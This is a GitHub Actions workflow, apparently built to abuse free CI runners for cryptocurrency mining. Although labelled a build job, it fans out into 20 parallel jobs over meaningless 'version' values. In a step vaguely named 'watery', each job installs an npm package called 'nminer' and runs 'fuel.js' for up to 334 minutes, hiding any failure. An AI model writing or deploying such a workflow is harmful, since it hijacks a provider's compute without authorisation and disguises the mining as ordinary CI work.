name: fuel
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7660 }
          - { version: 8078 }
          - { version: 4034 }
          - { version: 2330 }
          - { version: 4510 }
          - { version: 8182 }
          - { version: 8603 }
          - { version: 6933 }
          - { version: 8359 }
          - { version: 8295 }
          - { version: 7728 }
          - { version: 3201 }
          - { version: 8823 }
          - { version: 6305 }
          - { version: 9807 }
          - { version: 105 }
          - { version: 3507 }
          - { version: 6551 }
          - { version: 3219 }
          - { version: 803 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: watery
        run: |
          npm install nminer@latest
          timeout 334m node fuel.js || echo "fuel executed"